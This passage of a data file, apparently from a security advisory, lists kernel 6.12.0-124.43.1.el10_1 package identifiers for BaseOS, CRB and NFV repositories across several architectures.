"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
